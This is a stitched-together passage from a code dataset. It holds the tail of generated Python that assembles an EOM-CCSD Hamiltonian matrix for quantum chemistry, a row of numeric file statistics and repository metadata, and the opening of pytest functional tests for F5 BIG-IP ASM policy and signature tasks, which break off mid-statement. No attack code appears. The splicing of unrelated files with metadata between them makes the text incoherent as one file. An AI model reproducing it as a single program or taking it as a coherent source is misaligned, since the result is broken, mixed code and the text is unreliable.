# -1.0000 d(n,j)*<i,k||a,b>*t2(e,f,m,k)
Hdd += -1.000000000000000 * einsum('nj,ikab,efmk->efmnabij', kd[o, o], g[o, o, v, v], t2, optimize=['einsum_path', (1, 2), (0, 1)])
# -0.5000 d(e,a)*d(f,b)*d(n,j)*d(m,i)*<l,k||c,d>*t1(c,k)*t1(d,l)
Hdd += -0.500000000000000 * einsum('ea,fb,nj,mi,lkcd,ck,dl->efmnabij', kd[v, v], kd[v, v], kd[o, o], kd[o, o], g[o, o, v, v], t1, t1, optimize=['einsum_path', (0, 1), (2, 3), (2, 4), (0, 3), (0, 2), (0, 1)])
# 0.5000 d(e,a)*d(f,b)*d(m,j)*d(n,i)*<l,k||c,d>*t1(c,k)*t1(d,l)
Hdd += 0.500000000000000 * einsum('ea,fb,mj,ni,lkcd,ck,dl->efmnabij', kd[v, v], kd[v, v], kd[o, o], kd[o, o], g[o, o, v, v], t1, t1, optimize=['einsum_path', (0, 1), (2, 3), (2, 4), (0, 3), (0, 2), (0, 1)])
# 0.5000 d(f,a)*d(e,b)*d(n,j)*d(m,i)*<l,k||c,d>*t1(c,k)*t1(d,l)
Hdd += 0.500000000000000 * einsum('fa,eb,nj,mi,lkcd,ck,dl->efmnabij', kd[v, v], kd[v, v], kd[o, o], kd[o, o], g[o, o, v, v], t1, t1, optimize=['einsum_path', (0, 1), (2, 3), (2, 4), (0, 3), (0, 2), (0, 1)])
# -0.5000 d(f,a)*d(e,b)*d(m,j)*d(n,i)*<l,k||c,d>*t1(c,k)*t1(d,l)
Hdd += -0.500000000000000 * einsum('fa,eb,mj,ni,lkcd,ck,dl->efmnabij', kd[v, v], kd[v, v], kd[o, o], kd[o, o], g[o, o, v, v], t1, t1, optimize=['einsum_path', (0, 1), (2, 3), (2, 4), (0, 3), (0, 2), (0, 1)])
# 1.0000 d(e,a)*d(f,b)*d(m,i)*<j,k||c,d>*t1(c,k)*t1(d,n)
Hdd += 1.000000000000000 * einsum('ea,fb,mi,jkcd,ck,dn->efmnabij', kd[v, v], kd[v, v], kd[o, o], g[o, o, v, v], t1, t1, optimize=['einsum_path', (0, 1), (1, 2), (1, 3), (0, 2), (0, 1)])
# -1.0000 d(e,a)*d(f,b)*d(m,j)*<i,k||c,d>*t1(c,k)*t1(d,n)
Hdd += -1.000000000000000 * einsum('ea,fb,mj,ikcd,ck,dn->efmnabij', kd[v, v], kd[v, v], kd[o, o], g[o, o, v, v], t1, t1, optimize=['einsum_path', (0, 1), (1, 2), (1, 3), (0, 2), (0, 1)])
# -1.0000 d(f,a)*d(e,b)*d(m,i)*<j,k||c,d>*t1(c,k)*t1(d,n)
Hdd += -1.000000000000000 * einsum('fa,eb,mi,jkcd,ck,dn->efmnabij', kd[v, v], kd[v, v], kd[o, o], g[o, o, v, v], t1, t1, optimize=['einsum_path', (0, 1), (1, 2), (1, 3), (0, 2), (0, 1)])
# 1.0000 d(f,a)*d(e,b)*d(m,j)*<i,k||c,d>*t1(c,k)*t1(d,n)
Hdd += 1.000000000000000 * einsum('fa,eb,mj,ikcd,ck,dn->efmnabij', kd[v, v], kd[v, v], kd[o, o], g[o, o, v, v], t1, t1, optimize=['einsum_path', (0, 1), (1, 2), (1, 3), (0, 2), (0, 1)])
# -1.0000 d(e,a)*d(f,b)*d(n,i)*<j,k||c,d>*t1(c,k)*t1(d,m)
Hdd += -1.000000000000000 * einsum('ea,fb,ni,jkcd,ck,dm->efmnabij', kd[v, v], kd[v, v], kd[o, o], g[o, o, v, v], t1, t1, optimize=['einsum_path', (0, 1), (1, 2), (1, 3), (0, 2), (0, 1)])
# 1.0000 d(e,a)*d(f,b)*d(n,j)*<i,k||c,d>*t1(c,k)*t1(d,m)
Hdd += 1.000000000000000 * einsum('ea,fb,nj,ikcd,ck,dm->efmnabij', kd[v, v], kd[v, v], kd[o, o], g[o, o, v, v], t1, t1, optimize=['einsum_path', (0, 1), (1, 2), (1, 3), (0, 2), (0, 1)])
# 1.0000 d(f,a)*d(e,b)*d(n,i)*<j,k||c,d>*t1(c,k)*t1(d,m)
Hdd += 1.000000000000000 * einsum('fa,eb,ni,jkcd,ck,dm->efmnabij', kd[v, v], kd[v, v], kd[o, o], g[o, o, v, v], t1, t1, optimize=['einsum_path', (0, 1), (1, 2), (1, 3), (0, 2), (0, 1)])
# -1.0000 d(f,a)*d(e,b)*d(n,j)*<i,k||c,d>*t1(c,k)*t1(d,m)
Hdd += -1.000000000000000 * einsum('fa,eb,nj,ikcd,ck,dm->efmnabij', kd[v, v], kd[v, v], kd[o, o], g[o, o, v, v], t1, t1, optimize=['einsum_path', (0, 1), (1, 2), (1, 3), (0, 2), (0, 1)])
# 1.0000 d(f,b)*d(n,j)*d(m,i)*<l,k||c,a>*t1(c,k)*t1(e,l)
Hdd += 1.000000000000000 * einsum('fb,nj,mi,lkca,ck,el->efmnabij', kd[v, v], kd[o, o], kd[o, o], g[o, o, v, v], t1, t1, optimize=['einsum_path', (0, 1), (1, 2), (1, 3), (0, 2), (0, 1)])
# -1.0000 d(f,b)*d(m,j)*d(n,i)*<l,k||c,a>*t1(c,k)*t1(e,l)
Hdd += -1.000000000000000 * einsum('fb,mj,ni,lkca,ck,el->efmnabij', kd[v, v], kd[o, o], kd[o, o], g[o, o, v, v], t1, t1, optimize=['einsum_path', (0, 1), (1, 2), (1, 3), (0, 2), (0, 1)])
# -1.0000 d(f,a)*d(n,j)*d(m,i)*<l,k||c,b>*t1(c,k)*t1(e,l)
Hdd += -1.000000000000000 * einsum('fa,nj,mi,lkcb,ck,el->efmnabij', kd[v, v], kd[o, o], kd[o, o], g[o, o, v, v], t1, t1, optimize=['einsum_path', (0, 1), (1, 2), (1, 3), (0, 2), (0, 1)])
# 1.0000 d(f,a)*d(m,j)*d(n,i)*<l,k||c,b>*t1(c,k)*t1(e,l)
Hdd += 1.000000000000000 * einsum('fa,mj,ni,lkcb,ck,el->efmnabij', kd[v, v], kd[o, o], kd[o, o], g[o, o, v, v], t1, t1, optimize=['einsum_path', (0, 1), (1, 2), (1, 3), (0, 2), (0, 1)])
# -1.0000 d(e,b)*d(n,j)*d(m,i)*<l,k||c,a>*t1(c,k)*t1(f,l)
Hdd += -1.000000000000000 * einsum('eb,nj,mi,lkca,ck,fl->efmnabij', kd[v, v], kd[o, o], kd[o, o], g[o, o, v, v], t1, t1, optimize=['einsum_path', (0, 1), (1, 2), (1, 3), (0, 2), (0, 1)])
# 1.0000 d(e,b)*d(m,j)*d(n,i)*<l,k||c,a>*t1(c,k)*t1(f,l)
Hdd += 1.000000000000000 * einsum('eb,mj,ni,lkca,ck,fl->efmnabij', kd[v, v], kd[o, o], kd[o, o], g[o, o, v, v], t1, t1, optimize=['einsum_path', (0, 1), (1, 2), (1, 3), (0, 2), (0, 1)])
# 1.0000 d(e,a)*d(n,j)*d(m,i)*<l,k||c,b>*t1(c,k)*t1(f,l)
Hdd += 1.000000000000000 * einsum('ea,nj,mi,lkcb,ck,fl->efmnabij', kd[v, v], kd[o, o], kd[o, o], g[o, o, v, v], t1, t1, optimize=['einsum_path', (0, 1), (1, 2), (1, 3), (0, 2), (0, 1)])
# -1.0000 d(e,a)*d(m,j)*d(n,i)*<l,k||c,b>*t1(c,k)*t1(f,l)
Hdd += -1.000000000000000 * einsum('ea,mj,ni,lkcb,ck,fl->efmnabij', kd[v, v], kd[o, o], kd[o, o], g[o, o, v, v], t1, t1, optimize=['einsum_path', (0, 1), (1, 2), (1, 3), (0, 2), (0, 1)])
# -1.0000 d(e,a)*d(f,b)*<i,j||c,d>*t1(c,n)*t1(d,m)
Hdd += -1.000000000000000 * einsum('ea,fb,ijcd,cn,dm->efmnabij', kd[v, v], kd[v, v], g[o, o, v, v], t1, t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 2), (0, 1)])
# 1.0000 d(f,a)*d(e,b)*<i,j||c,d>*t1(c,n)*t1(d,m)
Hdd += 1.000000000000000 * einsum('fa,eb,ijcd,cn,dm->efmnabij', kd[v, v], kd[v, v], g[o, o, v, v], t1, t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 2), (0, 1)])
# 1.0000 d(f,b)*d(m,i)*<j,k||c,a>*t1(c,n)*t1(e,k)
Hdd += 1.000000000000000 * einsum('fb,mi,jkca,cn,ek->efmnabij', kd[v, v], kd[o, o], g[o, o, v, v], t1, t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 2), (0, 1)])
# -1.0000 d(f,b)*d(m,j)*<i,k||c,a>*t1(c,n)*t1(e,k)
Hdd += -1.000000000000000 * einsum('fb,mj,ikca,cn,ek->efmnabij', kd[v, v], kd[o, o], g[o, o, v, v], t1, t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 2), (0, 1)])
# -1.0000 d(f,a)*d(m,i)*<j,k||c,b>*t1(c,n)*t1(e,k)
Hdd += -1.000000000000000 * einsum('fa,mi,jkcb,cn,ek->efmnabij', kd[v, v], kd[o, o], g[o, o, v, v], t1, t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 2), (0, 1)])
# 1.0000 d(f,a)*d(m,j)*<i,k||c,b>*t1(c,n)*t1(e,k)
Hdd += 1.000000000000000 * einsum('fa,mj,ikcb,cn,ek->efmnabij', kd[v, v], kd[o, o], g[o, o, v, v], t1, t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 2), (0, 1)])
# -1.0000 d(e,b)*d(m,i)*<j,k||c,a>*t1(c,n)*t1(f,k)
Hdd += -1.000000000000000 * einsum('eb,mi,jkca,cn,fk->efmnabij', kd[v, v], kd[o, o], g[o, o, v, v], t1, t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 2), (0, 1)])
# 1.0000 d(e,b)*d(m,j)*<i,k||c,a>*t1(c,n)*t1(f,k)
Hdd += 1.000000000000000 * einsum('eb,mj,ikca,cn,fk->efmnabij', kd[v, v], kd[o, o], g[o, o, v, v], t1, t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 2), (0, 1)])
# 1.0000 d(e,a)*d(m,i)*<j,k||c,b>*t1(c,n)*t1(f,k)
Hdd += 1.000000000000000 * einsum('ea,mi,jkcb,cn,fk->efmnabij', kd[v, v], kd[o, o], g[o, o, v, v], t1, t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 2), (0, 1)])
# -1.0000 d(e,a)*d(m,j)*<i,k||c,b>*t1(c,n)*t1(f,k)
Hdd += -1.000000000000000 * einsum('ea,mj,ikcb,cn,fk->efmnabij', kd[v, v], kd[o, o], g[o, o, v, v], t1, t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 2), (0, 1)])
# -1.0000 d(f,b)*d(n,i)*<j,k||c,a>*t1(c,m)*t1(e,k)
Hdd += -1.000000000000000 * einsum('fb,ni,jkca,cm,ek->efmnabij', kd[v, v], kd[o, o], g[o, o, v, v], t1, t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 2), (0, 1)])
# 1.0000 d(f,b)*d(n,j)*<i,k||c,a>*t1(c,m)*t1(e,k)
Hdd += 1.000000000000000 * einsum('fb,nj,ikca,cm,ek->efmnabij', kd[v, v], kd[o, o], g[o, o, v, v], t1, t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 2), (0, 1)])
# 1.0000 d(f,a)*d(n,i)*<j,k||c,b>*t1(c,m)*t1(e,k)
Hdd += 1.000000000000000 * einsum('fa,ni,jkcb,cm,ek->efmnabij', kd[v, v], kd[o, o], g[o, o, v, v], t1, t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 2), (0, 1)])
# -1.0000 d(f,a)*d(n,j)*<i,k||c,b>*t1(c,m)*t1(e,k)
Hdd += -1.000000000000000 * einsum('fa,nj,ikcb,cm,ek->efmnabij', kd[v, v], kd[o, o], g[o, o, v, v], t1, t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 2), (0, 1)])
# 1.0000 d(e,b)*d(n,i)*<j,k||c,a>*t1(c,m)*t1(f,k)
Hdd += 1.000000000000000 * einsum('eb,ni,jkca,cm,fk->efmnabij', kd[v, v], kd[o, o], g[o, o, v, v], t1, t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 2), (0, 1)])
# -1.0000 d(e,b)*d(n,j)*<i,k||c,a>*t1(c,m)*t1(f,k)
Hdd += -1.000000000000000 * einsum('eb,nj,ikca,cm,fk->efmnabij', kd[v, v], kd[o, o], g[o, o, v, v], t1, t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 2), (0, 1)])
# -1.0000 d(e,a)*d(n,i)*<j,k||c,b>*t1(c,m)*t1(f,k)
Hdd += -1.000000000000000 * einsum('ea,ni,jkcb,cm,fk->efmnabij', kd[v, v], kd[o, o], g[o, o, v, v], t1, t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 2), (0, 1)])
# 1.0000 d(e,a)*d(n,j)*<i,k||c,b>*t1(c,m)*t1(f,k)
Hdd += 1.000000000000000 * einsum('ea,nj,ikcb,cm,fk->efmnabij', kd[v, v], kd[o, o], g[o, o, v, v], t1, t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 2), (0, 1)])
# -1.0000 d(n,j)*d(m,i)*<l,k||a,b>*t1(e,k)*t1(f,l)
Hdd += -1.000000000000000 * einsum('nj,mi,lkab,ek,fl->efmnabij', kd[o, o], kd[o, o], g[o, o, v, v], t1, t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 2), (0, 1)])
# 1.0000 d(m,j)*d(n,i)*<l,k||a,b>*t1(e,k)*t1(f,l)
Hdd += 1.000000000000000 * einsum('mj,ni,lkab,ek,fl->efmnabij', kd[o, o], kd[o, o], g[o, o, v, v], t1, t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 2), (0, 1)])
return H00, Hs0, H0s, Hd0, H0d, Hss, Hsd, Hds, Hdd
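# Pack the individual blocks into the full EOM-CCSD Hamiltonian matrix. The basis
# ordering used below is: the reference state (index 0), then the singles |ai> with
# composite index 1 + a*nsocc + i, then the doubles |abij> (a < b, i < j) starting
# at offset 1 + nsvirt*nsocc.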
def pack_eom_ccsd_H(H00, Hs0, H0s, Hd0, H0d, Hss, Hsd, Hds, Hdd, nsocc, nsvirt):
    dim = int(1 + nsvirt*(nsvirt-1)/2*nsocc*(nsocc-1)/2 + nsvirt*nsocc)
    H = np.zeros((dim,dim))
    # 00 block
    H[0,0] = H00
    # 0s, s0 blocks
    for a in range (0,nsvirt):
        for i in range (0,nsocc):
            ai = 1 + a*nsocc + i
            H[ai,0] = Hs0[a,i]
            H[0,ai] = H0s[a,i]
    # ss block
    for a in range (0,nsvirt):
        for i in range (0,nsocc):
            ai = 1 + a*nsocc + i
            for e in range (0,nsvirt):
                for m in range (0,nsocc):
                    em = 1 + e*nsocc + m
                    H[ai,em] = Hss[a,i,e,m]
    # sd, ds blocks
    for a in range (0,nsvirt):
        for i in range (0,nsocc):
            ai = 1 + a*nsocc + i
            efmn = 1 + nsocc*nsvirt
            for e in range (0,nsvirt):
                for f in range (e+1,nsvirt):
                    for m in range (0,nsocc):
                        for n in range (m+1,nsocc):
                            H[ai,efmn] = Hsd[a,i,e,f,m,n]
                            H[efmn,ai] = Hds[e,f,m,n,a,i]
                            efmn += 1
    # 0d, d0 blocks
    abij = 1 + nsocc*nsvirt
    for a in range (0,nsvirt):
        for b in range (a+1,nsvirt):
            for i in range (0,nsocc):
                for j in range (i+1,nsocc):
                    H[abij,0] = Hd0[a,b,i,j]
                    H[0,abij] = H0d[a,b,i,j]
                    abij += 1
    # dd blocks
    abij = 1 + nsocc*nsvirt
    for a in range (0,nsvirt):
        for b in range (a+1,nsvirt):
            for i in range (0,nsocc):
                for j in range (i+1,nsocc):
                    efmn = 1 + nsocc*nsvirt
                    for e in range (0,nsvirt):
                        for f in range (e+1,nsvirt):
                            for m in range (0,nsocc):
                                for n in range (m+1,nsocc):
                                    H[abij,efmn] = Hdd[a,b,i,j,e,f,m,n]
                                    efmn += 1
                    abij += 1
    return H
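# Build the full EOM-CCSD Hamiltonian. kd is an identity matrix over the combined
# occupied+virtual spin-orbital space; it is sliced as kd[o, o] and kd[v, v] above
# to supply the Kronecker deltas d(m,i) and d(e,a) appearing in the matrix elements.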
def build_eom_ccsd_H(f, g, o, v, t1, t2, nsocc, nsvirt):
    kd = np.zeros((nsocc+nsvirt,nsocc+nsvirt))
    for i in range (0,nsocc+nsvirt):
        kd[i,i] = 1.0
    H00, Hs0, H0s, Hd0, H0d, Hss, Hsd, Hds, Hdd = build_eom_ccsd_H_by_block(kd,f, g, o, v, t1, t2)
    H = pack_eom_ccsd_H(H00, Hs0, H0s, Hd0, H0d, Hss, Hsd, Hds, Hdd, nsocc, nsvirt)
    return H
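# Example usage (a sketch, not part of the generated code): assuming f, g, o, v, t1
# and t2 come from a converged CCSD calculation provided elsewhere, the EOM-CCSD
# spectrum could be obtained by diagonalizing the (non-Hermitian) matrix H, e.g.
#
#     H = build_eom_ccsd_H(f, g, o, v, t1, t2, nsocc, nsvirt)
#     eigenvalues = np.linalg.eigvals(H)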
| 66.273188 | 225 | 0.508206 | 19,198 | 91,457 | 2.393531 | 0.018544 | 0.032426 | 0.142587 | 0.041392 | 0.953124 | 0.937695 | 0.913843 | 0.885574 | 0.844182 | 0.803922 | 0 | 0.168836 | 0.191839 | 91,457 | 1,379 | 226 | 66.321247 | 0.452863 | 0.204883 | 0 | 0.159763 | 0 | 0 | 0.185434 | 0.089625 | 0 | 0 | 0 | 0 | 0 | 1 | 0.005917 | false | 0 | 0.003945 | 0 | 0.015779 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
5bd059b5f4c7a944020810a86b2965b4db2a1be5 | 32,679 | py | Python | f5/bigip/tm/asm/test/functional/test_tasks.py | nghia-tran/f5-common-python | acb23a6e5830a119b460c19a578654113419f5c3 | ["Apache-2.0"] | 272 | 2016-02-23T06:05:44.000Z | 2022-02-20T02:09:32.000Z | f5/bigip/tm/asm/test/functional/test_tasks.py | nghia-tran/f5-common-python | acb23a6e5830a119b460c19a578654113419f5c3 | ["Apache-2.0"] | 1,103 | 2016-02-11T17:48:03.000Z | 2022-02-15T17:13:37.000Z | f5/bigip/tm/asm/test/functional/test_tasks.py | nghia-tran/f5-common-python | acb23a6e5830a119b460c19a578654113419f5c3 | ["Apache-2.0"] | 167 | 2016-02-11T17:48:21.000Z | 2022-01-17T20:13:05.000Z |
# Copyright 2015 F5 Networks Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import pytest
import tempfile
import time
from distutils.version import LooseVersion
from f5.bigip.tm.asm.tasks import Apply_Policy
from f5.bigip.tm.asm.tasks import Check_Signature
from f5.bigip.tm.asm.tasks import Export_Policy
from f5.bigip.tm.asm.tasks import Export_Signature
from f5.bigip.tm.asm.tasks import Import_Policy
from f5.bigip.tm.asm.tasks import Import_Vulnerabilities
from f5.bigip.tm.asm.tasks import Update_Signature
from f5.sdk_exception import MissingRequiredCreationParameter
from f5.sdk_exception import UnsupportedOperation
from jinja2 import Environment
from jinja2 import FileSystemLoader
from requests.exceptions import HTTPError
if LooseVersion(pytest.config.getoption('--release')) >= LooseVersion('12.1.0'):
SCAN = 'trustwave'
else:
SCAN = 'cenzic-hailstorm'
F = ''
def file_read():
file = tempfile.NamedTemporaryFile()
name = os.path.basename(file.name)
dirpath = os.path.dirname(__file__)
path = os.path.join(dirpath, 'test_files')
loader = FileSystemLoader(path)
env = Environment(
loader=loader
)
template = env.get_template('fake_policy.xml')
result = template.render(fake_policy=name)
return result
def remove_policies(mgmt_root, policy=None):
policies = mgmt_root.tm.asm.policies_s.get_collection()
if policy is None:
resources = policies
else:
resources = [p for p in policies if p.name == policy]
for resource in resources:
resource.delete()
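
# Sketch of a shared helper (not part of the original test module): every fixture
# below inlines the same refresh-until-terminal-status loop, which could be
# consolidated into a single polling function like this one.
def wait_for_task(task, interval=1):
    while True:
        task.refresh()
        if task.status in ['COMPLETED', 'FAILURE']:
            return task
        time.sleep(interval)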
@pytest.fixture(scope='function')
def partition(mgmt_root):
file = tempfile.NamedTemporaryFile()
name = os.path.basename(file.name)
partitions = mgmt_root.tm.auth.partitions.partition
local = partitions.create(name=name)
yield local
local.delete()
@pytest.fixture(scope='function')
def check_sig(mgmt_root):
task = mgmt_root.tm.asm.tasks.check_signatures_s.check_signature.fetch()
while True:
task.refresh()
if task.status in ['COMPLETED', 'FAILURE']:
break
time.sleep(1)
yield task
task.delete()
@pytest.fixture(scope='function')
def update_sig(mgmt_root):
task = mgmt_root.tm.asm.tasks.update_signatures_s.update_signature.fetch()
while True:
task.refresh()
if task.status in ['COMPLETED', 'FAILURE']:
break
time.sleep(1)
yield task
task.delete()
@pytest.fixture(scope='function')
def export_basic(mgmt_root):
task = mgmt_root.tm.asm.tasks.export_signatures_s.export_signature.create(
filename='fake_export.xml'
)
while True:
task.refresh()
if task.status in ['COMPLETED', 'FAILURE']:
break
time.sleep(1)
yield task
task.delete()
@pytest.fixture(scope='function')
def set_policy(mgmt_root):
file = tempfile.NamedTemporaryFile()
name = os.path.basename(file.name)
pol1 = mgmt_root.tm.asm.policies_s.policy.create(
name=name
)
pol1.vulnerability_assessment.modify(scannerType=SCAN)
yield pol1.selfLink
@pytest.fixture(scope='function')
def set_policy2(mgmt_root):
file = tempfile.NamedTemporaryFile()
name = os.path.basename(file.name)
pol1 = mgmt_root.tm.asm.policies_s.policy.create(
name=name
)
yield pol1.selfLink
pol1.delete()
@pytest.fixture(scope='function')
def apply_policy(mgmt_root, set_policy2):
reference = {'link': set_policy2}
task = mgmt_root.tm.asm.tasks.apply_policy_s.apply_policy.create(
policyReference=reference
)
while True:
task.refresh()
if task.status in ['COMPLETED', 'FAILURE']:
break
time.sleep(1)
yield task
task.delete()
@pytest.fixture(scope='function')
def export_policy(mgmt_root, set_policy2):
file = tempfile.NamedTemporaryFile()
name = os.path.basename(file.name)
reference = {'link': set_policy2}
exp1 = mgmt_root.tm.asm.tasks.export_policy_s.export_policy.create(
filename=name + '.xml',
policyReference=reference
)
while True:
exp1.refresh()
if exp1.status in ['COMPLETED', 'FAILURE']:
break
time.sleep(1)
yield exp1
exp1.delete()
@pytest.fixture(scope='function')
def export_policy_inline(mgmt_root, set_policy2):
reference = {'link': set_policy2}
exp1 = mgmt_root.tm.asm.tasks.export_policy_s.export_policy.create(
inline=True,
policyReference=reference
)
while True:
exp1.refresh()
if exp1.status in ['COMPLETED', 'FAILURE']:
break
time.sleep(1)
yield exp1
exp1.delete()
@pytest.fixture(scope='function')
def import_policy_base64(mgmt_root):
content = file_read()
file = tempfile.NamedTemporaryFile()
name = os.path.basename(file.name)
task = mgmt_root.tm.asm.tasks.import_policy_s.import_policy.create(
file=content,
name=name,
isBase64=True
)
while True:
task.refresh()
if task.status in ['COMPLETED', 'FAILURE']:
break
time.sleep(1)
yield task
task.delete()
@pytest.fixture(scope='function')
def import_policy_template(mgmt_root):
tmpl = mgmt_root.tm.asm.policy_templates_s.get_collection()
link = {'link': tmpl[0].selfLink}
f = tempfile.NamedTemporaryFile()
name = os.path.basename(f.name)
task = mgmt_root.tm.asm.tasks.import_policy_s.import_policy.create(
policyTemplateReference=link,
name=name,
)
while True:
task.refresh()
if task.status in ['COMPLETED', 'FAILURE']:
break
time.sleep(1)
yield task
task.delete()
@pytest.fixture(scope='function')
def import_policy(mgmt_root):
content = file_read()
file = tempfile.NamedTemporaryFile()
name = os.path.basename(file.name)
task = mgmt_root.tm.asm.tasks.import_policy_s.import_policy.create(
file=content,
name=name
)
while True:
task.refresh()
if task.status in ['COMPLETED', 'FAILURE']:
break
time.sleep(1)
yield task
task.delete()
@pytest.fixture(scope='function')
def import_partitioned_policy(mgmt_root, partition):
content = file_read()
file = tempfile.NamedTemporaryFile()
name = os.path.basename(file.name)
task = mgmt_root.tm.asm.tasks.import_policy_s.import_policy.create(
file=content,
fullPath='/{0}/{1}'.format(partition.name, name)
)
while True:
task.refresh()
if task.status in ['COMPLETED', 'FAILURE']:
break
time.sleep(1)
yield task
task.delete()
@pytest.fixture(scope='function')
def import_partitioned_policy2(mgmt_root, partition):
content = file_read()
file = tempfile.NamedTemporaryFile()
name = os.path.basename(file.name)
task = mgmt_root.tm.asm.tasks.import_policy_s.import_policy.create(
file=content,
name=name,
partition=partition.name
)
while True:
task.refresh()
if task.status in ['COMPLETED', 'FAILURE']:
break
time.sleep(1)
yield task
task.delete()
@pytest.fixture(scope='function')
def import_vuln(mgmt_root, set_policy):
reference = {'link': set_policy}
imports = mgmt_root.tm.asm.tasks.import_vulnerabilities_s
content = file_read()
file = tempfile.NamedTemporaryFile()
fh = open(file.name, 'w')
fh.write(content)
fh.close()
mgmt_root.tm.asm.file_transfer.uploads.upload_file(file.name)
task = imports.import_vulnerabilities.create(
filename=file.name,
policyReference=reference,
importAllDomainNames=True
)
while True:
task.refresh()
if task.status in ['COMPLETED', 'FAILURE']:
break
time.sleep(1)
yield task
task.delete()
class TestApplyPolicy(object):
def test_create_req_arg(self, apply_policy, set_policy2):
reference = {'link': set_policy2}
ap = apply_policy
assert ap.status == 'COMPLETED'
assert ap.kind == 'tm:asm:tasks:apply-policy:apply-policy-taskstate'
assert ap.policyReference == reference
def test_refresh(self, apply_policy, set_policy2):
reference = {'link': set_policy2}
ap = apply_policy
hashid = str(ap.id)
link = ap.selfLink
ap.refresh()
assert ap.kind == 'tm:asm:tasks:apply-policy:apply-policy-taskstate'
assert ap.policyReference == reference
assert ap.id == hashid
assert ap.selfLink == link
def test_load_no_object(self, mgmt_root):
with pytest.raises(HTTPError) as err:
mgmt_root.tm.asm.tasks.apply_policy_s.apply_policy.load(
id='Lx3553-321')
assert err.value.response.status_code == 404
def test_load(self, apply_policy, mgmt_root):
ap = apply_policy
ap2 = mgmt_root.tm.asm.tasks.apply_policy_s.apply_policy.load(id=ap.id)
assert ap.id == ap2.id
assert ap.selfLink == ap2.selfLink
assert ap.policyReference == ap2.policyReference
def test_exists(self, apply_policy):
ap = apply_policy
hashid = str(ap.id)
assert ap.exists(id=hashid)
def test_delete(self, mgmt_root, set_policy2):
reference = {'link': set_policy2}
task = mgmt_root.tm.asm.tasks.apply_policy_s.apply_policy.create(
policyReference=reference
)
while True:
task.refresh()
if task.status in ['COMPLETED', 'FAILURE']:
break
time.sleep(1)
task.delete()
assert task.__dict__['deleted']
def test_apply_policy_collection(self, mgmt_root, apply_policy, set_policy2):
reference = {'link': set_policy2}
ap = apply_policy
assert ap.status == 'COMPLETED'
assert ap.kind == 'tm:asm:tasks:apply-policy:apply-policy-taskstate'
assert ap.policyReference == reference
col = mgmt_root.tm.asm.tasks.apply_policy_s.get_collection()
assert isinstance(col, list)
assert len(col)
assert isinstance(col[0], Apply_Policy)
class TestExportPolicy(object):
def test_create_req_arg(self, export_policy):
exp1 = export_policy
endpoint = str(exp1.id)
base_uri = 'https://localhost/mgmt/tm/asm/tasks/export-policy/'
final_uri = base_uri+endpoint
assert exp1.selfLink.startswith(final_uri)
assert exp1.status == 'COMPLETED'
assert exp1.kind == 'tm:asm:tasks:export-policy:export-policy-taskstate'
assert exp1.inline is False
def test_create_inline_export(self, export_policy_inline):
exp1 = export_policy_inline
endpoint = str(exp1.id)
base_uri = 'https://localhost/mgmt/tm/asm/tasks/export-policy/'
final_uri = base_uri+endpoint
assert exp1.selfLink.startswith(final_uri)
assert exp1.kind == 'tm:asm:tasks:export-policy:export-policy-taskstate'
assert exp1.inline is True
def test_create_optional_args(self, mgmt_root, set_policy2):
file = tempfile.NamedTemporaryFile()
name = os.path.basename(file.name)
reference = {'link': set_policy2}
exp1 = mgmt_root.tm.asm.tasks.export_policy_s.export_policy.create(
filename=name + '.xml',
policyReference=reference,
inline=True
)
while True:
exp1.refresh()
if exp1.status in ['COMPLETED', 'FAILURE']:
break
time.sleep(1)
endpoint = str(exp1.id)
base_uri = 'https://localhost/mgmt/tm/asm/tasks/export-policy/'
final_uri = base_uri + endpoint
assert exp1.selfLink.startswith(final_uri)
assert exp1.status == 'COMPLETED'
assert exp1.kind == 'tm:asm:tasks:export-policy:export-policy-taskstate'
assert exp1.inline is True
def test_refresh(self, export_policy, mgmt_root):
exp1 = export_policy
exp2 = mgmt_root.tm.asm.tasks.export_policy_s.export_policy.load(id=exp1.id)
assert exp1.selfLink == exp2.selfLink
exp1.refresh()
assert exp1.selfLink == exp2.selfLink
def test_load_no_object(self, mgmt_root):
with pytest.raises(HTTPError) as err:
mgmt_root.tm.asm.tasks.export_policy_s.export_policy.load(id='Lx3553-321')
assert err.value.response.status_code == 404
def test_load(self, export_policy, mgmt_root):
exp1 = export_policy
exp2 = mgmt_root.tm.asm.tasks.export_policy_s.export_policy.load(id=exp1.id)
assert exp1.selfLink == exp2.selfLink
def test_delete(self, mgmt_root, set_policy2):
file = tempfile.NamedTemporaryFile()
name = os.path.basename(file.name)
reference = {'link': set_policy2}
exp1 = mgmt_root.tm.asm.tasks.export_policy_s.export_policy.create(
filename=name + '.xml',
policyReference=reference
)
while True:
exp1.refresh()
if exp1.status in ['COMPLETED', 'FAILURE']:
break
time.sleep(1)
hashid = str(exp1.id)
exp1.delete()
with pytest.raises(HTTPError) as err:
